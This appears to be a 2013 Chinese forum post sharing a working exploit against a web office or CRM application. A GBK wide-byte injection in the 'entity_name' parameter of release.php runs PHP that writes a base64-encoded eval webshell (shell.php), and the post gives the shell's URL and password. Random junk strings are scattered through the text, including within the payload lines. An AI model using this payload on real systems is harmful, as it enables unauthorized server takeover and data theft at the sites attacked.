此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
* R, q; N) e S: {$ I
5 F5 S8 e j1 C9 _% Z " s" C9 Z$ y; s- w
EXP:; a z+ A2 s& i
! d$ \( I% j& G5 a2 T/ D- t7 f第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}$ V. J& ~! P* c1 \$ G* k
' y% z# T6 K, g4 |% f" L
第二步: [GET]http://site/general/email/index.php5 ?& H$ z; j3 U/ m3 U! G' x
" Y! f( s0 I% g; a r
SHELL: http://site/general/email/shell.php 密码C' Q" s# p( J5 u* t S1 g6 K
5 S1 n! e/ C1 a- R# _! D
- L1 V0 n0 v, Y; L- y. U: x此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好) n4 b/ j* y9 d( I) O% S5 k2 M
: c6 s1 N8 E+ ?: F: X
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
! ^! [% z3 O0 N2 u% E; [' P
5 H2 }# z! G" D6 c# i$ {# a& Z1 S
|
发表于 2013-2-4 16:19:29
收藏
支持
反对